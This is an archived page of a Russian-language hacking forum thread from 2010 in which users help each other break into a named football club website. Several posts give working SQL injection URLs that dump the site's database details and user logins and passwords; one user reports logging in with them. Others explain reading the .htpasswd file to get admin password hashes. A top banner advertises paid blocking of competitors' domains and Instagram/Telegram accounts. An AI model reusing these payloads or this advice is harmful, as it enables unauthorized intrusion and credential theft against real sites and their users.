УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1442 из 2438

1442

Опции темы

Поиск в этой теме

Опции просмотра

#14411

16.07.2010, 22:13

boberko

Новичок

Регистрация: 24.01.2009

Сообщений: 10

Провел на форуме:
72528

Репутация: 1

Gorev, невижу ничего смешного, в бд логин и пароль для доступа нету...

Цитата:

Сообщение от None

всем привет!
вот скуля:

Код:

Code:
_http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2,  3,concat_ws(char(58),version(),user(),database(),@  @version_compile_os),5,6,7+--+

админка:

Код:

Code:
_http://www.fcdinamokirov.ru/admin.php

как зайти в админку с помощью скуля?возможно ли?

#14412

16.07.2010, 22:21

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

boberko

http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,group_concat(nick,char(58),password),5,6,7+from+ users+--+

хотя не думаю что это таблица админов

#14413

16.07.2010, 22:30

boberko

Новичок

Регистрация: 24.01.2009

Сообщений: 10

Провел на форуме:
72528

Репутация: 1

Konqi

это таблица простых пользователей, я заходил все пашет...для админов не подходит(

в бд этих данных точно нету, все пересмотрел не нашел...

возможно ли как то зайти на исходник файла и узнать логин и пароль? или никак?

#14414

16.07.2010, 22:34

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от boberko

boberko said:
Konqi
єто таблица простых пользователей, я заходил все пашет...для админов не подходит(
в бд этих данных точно нету, все пересмотрел не нашел...
возможно ли как то зайти на исходник файла и узнать логин и пароль? или никак?

если file_priv=Y и знаешь полный путь, то можешь читать файлы(скрипты, конфиги).

#14415

16.07.2010, 22:40

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от boberko

boberko said:
Gorev
, невижу ничего смешного, в бд логин и пароль для доступа нету...

какой нахрен смех? я тебе немекнул насчет бейсик авторизации...хоть погуглил бы перед тем как опять херню всякую постить...мде... знания участников форума с каждым днем стремительно уменьшаются...

где тот грей или джокестер, которые за такие вопросы из новичка делали чайника и ламера

#14416

16.07.2010, 23:12

Unknown

Guest

Сообщений: n/a

Провел на форуме:
54576

Репутация: 8

Цитата:

Сообщение от Redwood

Redwood said:
Есть ли способ передать GET запрос, чтобы в логах скобки не заменились на %3C %3E?

Кому передать ? Это ведь зависит от программы, как и каким способом сохраняет логи.

#14417

17.07.2010, 00:54

Dare

Новичок

Регистрация: 26.04.2010

Сообщений: 26

Провел на форуме:
136979

Репутация: 53

Отправить сообщение для Dare с помощью ICQ

Цитата:

Сообщение от None

это таблица простых пользователей, я заходил все пашет...для админов не подходит( в бд этих данных точно нету, все пересмотрел не нашел... возможно ли как то зайти на исходник файла и узнать логин и пароль? или никак?

Что куда у тебя не подходит? все там норм просто админка под хтаццессом (

обойти его способ есть, но надо права на запись... а если они есть париться с хтацессом помойму извращение.

имхо: вопрос в разряд тупые )))

Горев реально прав, ребята давайте чуток читать )

#14418

17.07.2010, 04:05

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от Dare

Dare said:
Что куда у тебя не подходит? все там норм просто админка под хтаццессом (
обойти его способ есть, но надо права на запись... а если они есть париться с хтацессом помойму извращение.
имхо: вопрос в разряд тупые )))
Горев реально прав, ребята давайте чуток читать )

но если есть file_priv и знаешь путь к сайту то можно читать .htpasswd, а там лежат пароли(хеши(AFAIK md5(unix))) к .htaccess

#14419

17.07.2010, 04:48

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от [Feldmarschall

"]
[Feldmarschall] said:
file_priv не для чтения файлов а для инклюдинга.

представим что ты прав, "инклудим" .htpasswd,

но это на сколько я знаю не script,a файл содержащий login:hash

и по твоему этот файл должен исполнятся?

я конечно этому не верю что file_priv инклудит, но если даже это было бы так, то в нашем случай инклуд=читалка, так как в файле нету кода.

но как мы знаем я всегда не прав,так что простите за дезинформацию.

ну а если серьезно то лучше бы ты этого не сказал.

#14420

17.07.2010, 04:49

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от [Feldmarschall

"]
[Feldmarschall] said:
file_priv не для чтения файлов а для инклюдинга.

[Feldmarschall], чо?

Страница 1442 из 2438

1442

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход